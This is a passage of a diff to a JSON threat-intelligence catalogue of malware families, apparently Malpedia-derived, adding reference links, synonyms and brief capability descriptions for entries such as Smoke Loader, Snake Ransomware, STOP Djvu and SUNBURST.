"https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", - "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", - "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", + "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://research.checkpoint.com/2019-resurgence-of-smokeloader/", + "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", + "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/", + "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "https://hatching.io/blog/tt-2020-08-27/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", + "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html", + "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", + "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html", "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", - "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", + "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/" ], "synonyms": [ - "Dofoil" + "Dofoil", + "Sharik", + "Smoke", + "Smoke Loader" ], "type": [] }, @@ -15731,12 +28639,80 @@ "uuid": "1fe0b2fe-5f9b-4359-b362-be611537442a", "value": "Smrss32 Ransomware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sn0wslogger", + "https://twitter.com/struppigel/status/1354806038805897216" + ], + "synonyms": [], + "type": [] + }, + "uuid": "17c6c227-5c9b-40eb-886b-19e2b137c5e8", + "value": "Sn0wsLogger" + }, + { + "description": "Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5 character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. This ransomware is reported to target an entire network, rather than individual workstations.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake", + "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/", + "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", + "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", + "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware", + "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md", + "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://twitter.com/bad_packets/status/1270957214300135426", + "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html", + "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/", + "https://twitter.com/milkr3am/status/1270019326976786432", + "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017", + "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + ], + "synonyms": [ + "EKANS", + "SNAKEHOSE" + ], + "type": [] + }, + "uuid": "547deef9-67c3-483e-933d-171ee8b6b918", + "value": "Snake Ransomware" + }, + { + "description": "Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode so that it the malware can act without expected countermeasures and it can encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch", + "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md", + "https://twitter.com/VK_Intel/status/1191414501297528832" + ], + "synonyms": [], + "type": [] + }, + "uuid": "98139439-6863-439c-b4d0-c6893f1afb23", + "value": "Snatch" + }, { "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/", + "https://www.youtube.com/watch?v=k3sM88o_maM", "https://twitter.com/VK_Intel/status/898549340121288704", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/" @@ -15767,7 +28743,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", - "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" + "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf", + "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html" ], "synonyms": [ "Ursnif" @@ -15815,6 +28792,36 @@ "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", "value": "Sobaken" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig", + "http://edition.cnn.com/2003/TECH/internet/08/21/sobig.virus/index.html" + ], + "synonyms": [ + "Palyh" + ], + "type": [] + }, + "uuid": "4e9f85e7-0575-40e5-8799-288ec28237ca", + "value": "Sobig" + }, + { + "description": "Socelars is an infostealer with main focus on:\r\n* Facebook Stealer (ads/manager)\r\n* Cookie Stealer | AdsCreditCard {Amazon}", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars", + "https://twitter.com/VK_Intel/status/1201584107928653824", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4366ea63-b784-428c-bb00-89ee99eaf8c3", + "value": "Socelars" + }, { "description": "", "meta": { @@ -15832,9 +28839,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [ "BIRDDOG", @@ -15845,13 +28853,31 @@ "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", "value": "SocksBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf" + ], + "synonyms": [ + "DelfsCake", + "HEAVYPOT", + "dfls" + ], + "type": [] + }, + "uuid": "016ea180-ec16-48ce-88ea-c78d8db369d5", + "value": "SodaMaster" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", - "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" + "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/", + "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/" ], "synonyms": [ "Napolar" @@ -15861,13 +28887,53 @@ "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", "value": "Solarbot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker", + "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4e08d816-9fe3-42ae-b7e4-f7182445f304", + "value": "solarmarker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat", + "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2b2cffc5-bf6e-4636-a906-829c32115655", + "value": "SombRAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorano", + "https://github.com/3xp0rt/SoranoStealer", + "https://3xp0rt.xyz/lpmkikVic", + "https://github.com/Alexuiop1337/SoranoStealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "897985dc-6b3e-4d92-bbe4-c4902194cdcc", + "value": "Sorano" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", - "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", - "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" + "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper" ], "synonyms": [], "type": [] @@ -15875,11 +28941,27 @@ "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", "value": "soraya" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0068e2fe-0d13-4073-be73-90118b1d285a", + "value": "SoreFang" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], @@ -15893,10 +28975,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", "https://attack.mitre.org/wiki/Software/S0157", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", - "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx", + "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/" ], "synonyms": [ "denis" @@ -15919,6 +29006,61 @@ "uuid": "813e2761-6d68-493f-846b-2fc86d2e8079", "value": "SPACESHIP" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3c676c22-8041-4cf6-8291-1bb9372e2d45", + "value": "Spark" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparkle", + "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "339c60f6-8758-4d32-aa33-b0d722e924bb", + "value": "Sparkle" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparksrv", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/luckycat-redux-campaign-attacks-multiple-targets-in-india-and-japan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1937c3e0-569d-4eb4-b769-ae5d9cc27755", + "value": "Sparksrv" + }, + { + "description": "Spartacus is ransomware written in .NET and emerged in the first half of 2018. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spartacus", + "https://bartblaze.blogspot.com/2018/04/this-is-spartacus-new-ransomware-on.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e4dce19f-bb8e-4ea1-b771-58b162946f29", + "value": "Spartacus" + }, { "description": "", "meta": { @@ -15932,6 +29074,19 @@ "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", "value": "Spedear" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spicyhotpot", + "https://www.crowdstrike.com/blog/spicy-hot-pot-rootkit-explained/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dfbe088e-dd6d-4bad-8e2b-7a4162034da4", + "value": "Spicy Hot Pot" + }, { "description": "", "meta": { @@ -15963,16 +29118,25 @@ "value": "SpyBot" }, { - "description": "", + "description": "SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the \"The Next Zeus Malware\". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye", + "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot", + "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393", + "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/", + "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html", + "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html", + "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/", + "http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye", + "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/" ], "synonyms": [], "type": [] }, - "uuid": "1628467f-cad5-453c-a5da-a4f543747d58", - "value": "win.spynet_rat" + "uuid": "814fa0b7-0468-4ed0-b910-2b3caec96d44", + "value": "SpyEye" }, { "description": "", @@ -15987,6 +29151,21 @@ "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", "value": "SquirtDanger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet", + "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices", + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf", + "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7e0667e8-67fd-4b5f-a3e4-3ced4dcaac1e", + "value": "SSHNET" + }, { "description": "", "meta": { @@ -16016,6 +29195,21 @@ "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", "value": "Stabuniq" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stalin_locker", + "https://www.bleepingcomputer.com/news/security/stalinlocker-deletes-your-files-unless-you-enter-the-right-code/" + ], + "synonyms": [ + "StalinScreamer" + ], + "type": [] + }, + "uuid": "8c38460b-fcfd-434e-b258-875854c6aff6", + "value": "StalinLocker" + }, { "description": "", "meta": { @@ -16123,11 +29317,34 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0c5bc5c8-5136-413a-bc5a-e13333271f49", + "value": "StoneDrill" + }, + { + "description": "STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads", + "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://securelist.com/keypass-ransomware/87412/", - "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/" + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ "Djvu", @@ -16171,10 +29388,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", + "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", - "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", - "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" + "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/", + "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/" ], "synonyms": [], "type": [] @@ -16187,7 +29411,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", + "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", + "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf", + "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/", + "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html", + "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], @@ -16196,6 +29432,194 @@ "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", "value": "Stuxnet" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suceful", + "https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "efe586da-a272-4898-9ebb-587f8f5a23ca", + "value": "SUCEFUL" + }, + { + "description": "FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst", + "https://www.brighttalk.com/webcast/7451/462719", + "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/", + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", + "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance", + "https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons", + "https://netresec.com/?b=212a6ad", + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/", + "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign", + "https://us-cert.cisa.gov/ncas/alerts/aa20-352a", + "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/", + "https://twitter.com/cybercdh/status/1339241246024404994", + "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306", + "https://www.brighttalk.com/webcast/7451/469525", + "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf", + "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug", + "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst", + "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html", + "https://www.solarwinds.com/securityadvisory", + "https://netresec.com/?b=211f30f", + "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view", + "https://github.com/sophos-cybersecurity/solarwinds-threathunt", + "https://twitter.com/megabeets_/status/1339308801112027138", + "https://www.youtube.com/watch?v=cMauHTV-lJg", + "https://twitter.com/0xrb/status/1339199268146442241", + "https://netresec.com/?b=211cd21", + "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards", + "https://github.com/RedDrip7/SunBurst_DGA_Decode", + "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution", + "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", + "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/", + "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/", + "https://twitter.com/cybercdh/status/1338975171093336067", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", + "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data", + "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update", + "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/", + "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f", + "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q", + "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/", + "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html", + "https://www.4hou.com/posts/KzZR", + "https://www.comae.com/posts/sunburst-memory-analysis/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + 